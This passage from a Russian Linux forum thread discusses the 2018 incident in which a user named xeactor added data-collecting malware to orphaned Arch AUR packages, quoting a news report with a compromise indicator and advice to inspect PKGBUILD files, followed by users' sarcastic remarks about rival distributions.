Несмотря на то, что вредоносный код ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой момент заменить содержимое u.sh. Например, на первом этапе злоумышленниками мог проводиться анализ наиболее популярных системных окружений с целью подбора оптимального для большинства поражённых систем кода для майнинга криптовалют или требующего выкуп вредоносного шифровальщика.

Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся без мэйнтейнера. AUR позволяет любому желающему продолжать разработку orphane-пакетов, чем и воспользовался злоумышленник. Разработчики дистрибутива много раз предупреждали пользователей, что к пакетам из AUR (также справедливо для PPA и прочих репозиториев, в которых сторонние пользователи могут размещать свои пакеты) следует относиться с осторожностью и по возможности проверять содержимое файла PKGBUILD.

Проблема была выявлена в течение нескольких часов после модификации пакетов. Изменение было сразу отклонено, а учётная запись разработчика xeactor заблокирована. Пользователям, 7 июля устанавливавшим обновления вышеотмеченных пакетов, рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer).

Ещё до перетряски АУРа не один раз встречал "мнения" что арчеводы уж сильно кичатся своей самой большой софтовой помойкой и пора бы их на место ставить, а то много выпендриваются. Вот и случилось!
Может перетряска была для защиты от "активных" завистников? Но...
Что смешно, так это то что на опеннетке особенно радуются и зубоскалят адепты сизифвой секты альтруистов, теперь они будут веде трещать что это у их барыжной поделки самое большое пузо из всех пасущих пингвинов.

Вне форума

#14 11-07-2018 21:13:27

redix
Участник
Здесь с 14-02-2013
Сообщений: 1,567
LinuxChrome 67.0

Re: Arch перестал работать yaourt

Со своего разрешения, процитирую себя же с арчефорума, где эта новость собрала комментариев раз в тридцать меньше, чем на жопеннете:

В конце топика на опеннете есть такой абзац:
"Проблема была выявлена в течение нескольких часов после модификации пакетов. Изменение было сразу отклонено, а учётная запись разработчика xeactor заблокирована. Пользователям, 7 июля устанавливавшим обновления вышеотмеченных пакетов, рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer)."

Это означает что: проблема устранена, липовый "майнтайнер" заблокирован, страшилка перешла в разряд "б\у".

PS. Это вовсе не отменяет необходимость использовать свое серое вещество, при установке пакетов из AUR и сторонних реп.

Что смешно, так это то что на опеннетке особенно радуются и зубоскалят адепты сизифвой секты альтруистов, теперь они будут веде трещать что это у их барыжной поделки самое большое пузо из всех пасущих пингвинов.

Альтруисты должны быть в кавычках по идее, эта контора в принципе живет своим желанием припасть к бюджетной сиське.


In Tux We Trust

Вне форума

Сейчас в этой теме пользователей: 0, гостей: 1
[Bot] CCBot

Подвал форума

Под управлением FluxBB
Модифицировал Visman

[ Сгенерировано за 0.015 сек, 10 запросов выполнено - Использовано памяти: 590.18 Кбайт (Пик: 779.2 Кбайт) ]